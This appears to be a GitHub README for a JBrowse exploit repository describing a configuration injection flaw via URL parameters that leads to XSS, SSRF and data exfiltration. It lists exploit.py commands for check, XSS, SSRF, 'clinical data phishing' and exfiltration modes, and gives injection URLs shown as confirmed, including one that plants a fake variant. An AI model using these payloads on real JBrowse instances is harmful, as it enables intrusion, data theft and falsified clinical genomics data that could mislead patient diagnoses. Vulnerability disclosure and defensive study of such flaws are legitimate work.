jabir-dev/CVE-2026-JBrowse-Injection

GitHub: jabir-dev/CVE-2026-JBrowse-Injection

Stars: 0 | Forks: 0

# CVE-2026-XXXXX: JBrowse Configuration Injection via URL Parameters ## Overview | Field | Value | |-------|-------| | **Product** | JBrowse | | **Vendor** | GMOD | | **Versions** | 1.0 through 1.16.11 (all 1.x versions) | | **Type** | Code Injection (CWE-94) / XSS (CWE-79) / SSRF (CWE-918) | | **CVSS 4.0** | 8.6 High | | **Impact** | XSS / SSRF / Data Exfiltration / Clinical Data Manipulation | | **bio.tools** | https://bio.tools/jbrowse | ## Vulnerability JBrowse accepts multiple URL query parameters and passes them directly to `JSON.parse()` without any validation or sanitization: // src/JBrowse/main.js:85-106 if (queryParams.addFeatures) { config.stores.url.features = JSON.parse(queryParams.addFeatures) // NO VALIDATION } if (queryParams.addTracks) { config.tracks = JSON.parse(queryParams.addTracks) // NO VALIDATION } if (queryParams.addBookmarks) { config.bookmarks.features = JSON.parse(queryParams.addBookmarks) // NO VALIDATION } if (queryParams.addStores) { config.stores = JSON.parse(queryParams.addStores) // NO VALIDATION } Combined with CORS wildcard in `.htaccess`: Header onsuccess set Access-Control-Allow-Origin * ## Impact ### 1. Cross-Site Scripting (XSS) Inject HTML/JavaScript via track names, feature attributes, or bookmarks. ### 2. Server-Side Request Forgery (SSRF) Configure stores to fetch internal resources (AWS metadata, internal APIs). ### 3. Clinical Data Manipulation Inject fake pathogenic variants into clinical genomics JBrowse instances, potentially leading to incorrect patient diagnoses. ### 4. Data Exfiltration Redirect data fetches to attacker-controlled servers. ## Usage # Check if target is vulnerable python3 exploit.py --target http://jbrowse.example.com --mode check # Generate XSS payloads python3 exploit.py --target http://jbrowse.example.com --mode xss # Generate SSRF payloads python3 exploit.py --target http://jbrowse.example.com --mode ssrf # Clinical data phishing python3 exploit.py --target http://jbrowse.example.com --mode phish # Data exfiltration python3 exploit.py --target http://jbrowse.example.com --mode exfil ### Quick Manual Test Open in browser: http://jbrowse.example.com/?data=sample_data/json/volvox&addTracks=[{"label":"test","key":"

","type":"FeatureTrack","store":"url"}] ## Root Cause 1. **No input validation** on `addFeatures`, `addTracks`, `addStores`, `addBookmarks` URL params 2. **CORS wildcard** (`Access-Control-Allow-Origin: *`) allows cross-origin exploitation 3. **No CSP headers** to prevent inline script execution 4. **No authentication** on any JBrowse functionality ## Confirmed Test Results ### Test 1: Data Injection - **URL**: `?addFeatures=[{"seq_id":"ctgA","start":1000,"end":5000,"name":"INJECTED_FAKE_VARIANT","type":"mRNA"}]` - **Result**: Fake mRNA feature rendered with full DNA sequence in browser - **Status**: **CONFIRMED** ### Test 2: XSS via Feature Name - **URL**: `?addFeatures=[{"seq_id":"ctgA","start":2000,"end":4000,"name":"

","type":"mRNA"}]` - **Result**: JavaScript alert() popup executed when clicking on feature - **Status**: **CONFIRMED** ## Disclaimer For **authorized security testing** and **educational purposes** only. ## License MIT